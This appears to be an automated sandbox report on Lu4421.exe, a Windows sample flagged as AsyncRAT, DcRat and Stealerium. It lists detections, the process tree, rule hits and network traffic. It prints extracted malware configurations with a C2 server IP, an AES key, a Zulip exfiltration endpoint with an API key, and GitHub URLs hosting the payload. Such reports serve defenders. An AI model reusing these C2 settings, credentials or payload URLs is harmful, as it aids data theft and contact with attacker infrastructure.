
Windows Analysis Report
Lu4421.exe

Overview

General Information

Sample name: Lu4421.exe
Analysis ID: 1577337
MD5: e5358fca58c0e1b1e29eb195fb0f4675
SHA1: a114c059fed08a501c344f40d9f702f03cdebbab
SHA256: 220c04c30a7dbd084fdebe00102f6340194845d8664dfd669a5549f23a1031c4
Tags: 18521511316185215113209, bulletproof, exe, Stealerium, Stealer, user-abus3reports

Detection

AsyncRAT, DcRat, Stealerium
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM5
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Stealerium
Yara detected Telegram Recon
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Lu4421.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\Lu4421.exe" MD5: E5358FCA58C0E1B1E29EB195FB0F4675)
    • svchost.exe (PID: 480 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 67CA41C73D556CC4CFC67FC5B425BBBD)
    • WerFault.exe (PID: 1060 cmdline: C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: Stealerium
Description: According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embeds a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor's addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium
{"Server": "51.89.44.68", "Ports": "8848", "Version": "1.0.7", "Autorun": "true", "Install_Folder": "%Temp%", "Install_File": "svchost.exe", "AES_key": "codpZo7sp26vCJaNdBX6AeJsQEdcysZj", "Mutex": "etb3t1tr5n", "Certificate": "MIICKzCCAZSgAwIBAgIVALyXBdFrd+RZ3+qdeoUf09MOZZyjMA0GCSqGSIb3DQEBDQUAMF8xEDAOBgNVBAMMB2RlZWphdnUxEzARBgNVBAsMCnF3cWRhbmNodW4xHDAaBgNVBAoME0RjUmF0IEJ5IHF3cWRhbmNodW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAyMjYwODM2NDhaFw0zNDEyMDUwODM2NDhaMBAxDjAMBgNVBAMMBURjUmF0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYBG4He/Q574HZ/APM0iLczQinqsYye5ejH4+Jn4a0H0XcUp2t1cZHExpOhz+AXul1Fyc5dqej9DWa2LiOIhAF+QVi9kEpiQ7oROO3aBA18ZAYMZEF7p5Cc9nESq7avNFBO9H0MoFM/NkjnzQVrnirOGOWCvQzvQNni4h+GAwmPQIDAQABozIwMDAdBgNVHQ4EFgQUUk4Zkw0pZ4X7HPoUbKwU1AM6ZigwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCLbPZDeVM0uVz5aGQdtliw6JbM+hLM6ViT0x1ekLT3Vys6KbotH2TC/sJph0XR1aLuiVZTh907AgwE7wK8wuBNEcyqYxbYslxK783vmPNZnU8wTI2Mf5hvsxIftwD6jj2bQrs7iNE2R8kA0cr6M5X30OZAVJtbfHx+KaA4bhvT0g==", "ServerSignature": "TgOPkoSwK50ROL73TIpqMjhVitaE57QcwTult9vLNILRIrVCY/vBZYLwQCNT33NmMQG0jNBBHbvw/4wy7BckYa8zQCUKS+IAyG6llcuwMMlU90EILj05Fxf+hcTpljihzyJLdY/g7vGbQp50Ejelt1z28kvim/7J2Kobrr6sanM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "true"}
{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source: Lu4421.exe; Rule: JoeSecurity_TelegramRecon; Description: Yara detected Telegram Recon; Author: Joe Security
Source: Lu4421.exe; Rule: JoeSecurity_Stealerium; Description: Yara detected Stealerium; Author: Joe Security
Source: Lu4421.exe; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: Lu4421.exe; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: Lu4421.exe; Rule: JoeSecurity_AntiVM_5; Description: Yara detected AntiVM_5; Author: Joe Security

Source: dump.pcap; Rule: Windows_Trojan_DCRat_1aeea1ac; Description: unknown; Author: unknown
  • 0x20e08: $b2: DcRat By qwqdanchun1

Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice; Description: Detects executables attempting to enumerate video devices using WMI; Author: ditekSHen
  • 0xd0ba: $q1: Select * from Win32_CacheMemory
  • 0xd0fa: $d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xd148: $d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xd196: $d3: {55272A00-42CB-11CE-8135-00AA004BB851}
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy; Description: Detects executables containing the string DcRatBy; Author: ditekSHen
  • 0xd6f6: $s1: DcRatBy

Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_DcRat_2; Description: Yara detected DcRat; Author: Joe Security
Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_DCRat_1aeea1ac; Description: unknown; Author: unknown
  • 0x3e43: $b2: DcRat By qwqdanchun1
  • 0xbb0f: $b2: DcRat By qwqdanchun1
  • 0xbd57: $b2: DcRat By qwqdanchun1
Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp; Rule: Windows_Trojan_DCRat_1aeea1ac; Description: unknown; Author: unknown
  • 0x15e4b: $b2: DcRat By qwqdanchun1
  • 0x169e7: $b2: DcRat By qwqdanchun1
Source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AntiVM_5; Description: Yara detected AntiVM_5; Author: Joe Security

Source: 1.0.svchost.exe.dd0000.0.unpack; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 1.0.svchost.exe.dd0000.0.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice; Description: Detects executables attempting to enumerate video devices using WMI; Author: ditekSHen
  • 0xd0ba: $q1: Select * from Win32_CacheMemory
  • 0xd0fa: $d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xd148: $d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xd196: $d3: {55272A00-42CB-11CE-8135-00AA004BB851}
Source: 1.0.svchost.exe.dd0000.0.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy; Description: Detects executables containing the string DcRatBy; Author: ditekSHen
  • 0xd6f6: $s1: DcRatBy
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack; Rule: JoeSecurity_AsyncRAT; Description: Yara detected AsyncRAT; Author: Joe Security
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice; Description: Detects executables attempting to enumerate video devices using WMI; Author: ditekSHen
  • 0xd0ba: $q1: Select * from Win32_CacheMemory
  • 0xd0fa: $d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xd148: $d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xd196: $d3: {55272A00-42CB-11CE-8135-00AA004BB851}

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\Lu4421.exe, ProcessId: 6768, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Lu4421.exe", ParentImage: C:\Users\user\Desktop\Lu4421.exe, ParentProcessId: 6768, ParentProcessName: Lu4421.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 480, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Lu4421.exe", ParentImage: C:\Users\user\Desktop\Lu4421.exe, ParentProcessId: 6768, ParentProcessName: Lu4421.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 480, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Lu4421.exe", ParentImage: C:\Users\user\Desktop\Lu4421.exe, ParentProcessId: 6768, ParentProcessName: Lu4421.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 480, ProcessName: svchost.exe

Timestamp: 2024-12-18T12:07:32.534040+0100; SID: 2842478; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source IP: 51.89.44.68; Source Port: 8848; Destination IP: 192.168.2.4; Destination Port: 49739; Protocol: TCP
Timestamp: 2024-12-18T12:07:27.709803+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; Source IP: 192.168.2.4; Source Port: 49737; Destination IP: 185.199.108.133; Destination Port: 443; Protocol: TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp; Malware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: AsyncRAT {"Server": "51.89.44.68", "Ports": "8848", "Version": "1.0.7", "Autorun": "true", "Install_Folder": "%Temp%", "Install_File": "svchost.exe", "AES_key": "codpZo7sp26vCJaNdBX6AeJsQEdcysZj", "Mutex": "etb3t1tr5n", "Certificate": "MIICKzCCAZSgAwIBAgIVALyXBdFrd+RZ3+qdeoUf09MOZZyjMA0GCSqGSIb3DQEBDQUAMF8xEDAOBgNVBAMMB2RlZWphdnUxEzARBgNVBAsMCnF3cWRhbmNodW4xHDAaBgNVBAoME0RjUmF0IEJ5IHF3cWRhbmNodW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAyMjYwODM2NDhaFw0zNDEyMDUwODM2NDhaMBAxDjAMBgNVBAMMBURjUmF0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYBG4He/Q574HZ/APM0iLczQinqsYye5ejH4+Jn4a0H0XcUp2t1cZHExpOhz+AXul1Fyc5dqej9DWa2LiOIhAF+QVi9kEpiQ7oROO3aBA18ZAYMZEF7p5Cc9nESq7avNFBO9H0MoFM/NkjnzQVrnirOGOWCvQzvQNni4h+GAwmPQIDAQABozIwMDAdBgNVHQ4EFgQUUk4Zkw0pZ4X7HPoUbKwU1AM6ZigwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCLbPZDeVM0uVz5aGQdtliw6JbM+hLM6ViT0x1ekLT3Vys6KbotH2TC/sJph0XR1aLuiVZTh907AgwE7wK8wuBNEcyqYxbYslxK783vmPNZnU8wTI2Mf5hvsxIftwD6jj2bQrs7iNE2R8kA0cr6M5X30OZAVJtbfHx+KaA4bhvT0g==", "ServerSignature": "TgOPkoSwK50ROL73TIpqMjhVitaE57QcwTult9vLNILRIrVCY/vBZYLwQCNT33NmMQG0jNBBHbvw/4wy7BckYa8zQCUKS+IAyG6llcuwMMlU90EILj05Fxf+hcTpljihzyJLdY/g7vGbQp50Ejelt1z28kvim/7J2Kobrr6sanM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "true"}
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; ReversingLabs: Detection: 84%
Source: Lu4421.exe; ReversingLabs: Detection: 68%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Joe Sandbox ML: detected
Source: Lu4421.exe; Joe Sandbox ML: detected
Source: Lu4421.exe; String decryptor:
Source: Lu4421.exe; String decryptor: https://api.telegram.org/bot
Source: Lu4421.exe; String decryptor: https://szurubooru.zulipchat.com/api/v1/messages
Source: Lu4421.exe; String decryptor: szurubooru@gmail.com
Source: Lu4421.exe; String decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
                        Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Management.pdbHl source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed source: Lu4421.exe
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: !costura.polly.core.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: re.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\Desktop\Lu4421.PDB source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceProcess.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb:l source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: mscorlib.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.ServiceProcess.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Xml.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdbpHN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Xml.pdb* source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: Lu4421.exe
                        Source: Binary string: System.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: Lu4421.exe, Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: System.Net.Http.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: PresentationFrameworkib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C880000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: Lu4421.exe
                        Source: Binary string: mscorlib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Net.Http.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: Lu4421.exe
                        Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: Lu4421.exe
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: Lu4421.exe
                        Source: Binary string: System.Core.pdbk source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr

Networking

Source: Network traffic; Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 51.89.44.68:8848 -> 192.168.2.4:49739
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Network Connect: 51.89.44.68 8848
Source: Malware configuration extractor; URLs: https://szurubooru.zulipchat.com/api/v1/messages
Source: global traffic; TCP traffic: 192.168.2.4:49739 -> 51.89.44.68:8848
Source: global traffic; HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /kgnfth/tumblr/raw/refs/heads/main/svchost.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1 Host: raw.githubusercontent.com
Source: Joe Sandbox View; IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View; IP Address: 20.233.83.145 20.233.83.145
Source: Joe Sandbox View; ASN Name: OVHFR OVHFR
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 185.199.108.133:443
Source: unknown; TCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /kgnfth/tumblr/raw/refs/heads/main/svchost.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1 Host: raw.githubusercontent.com
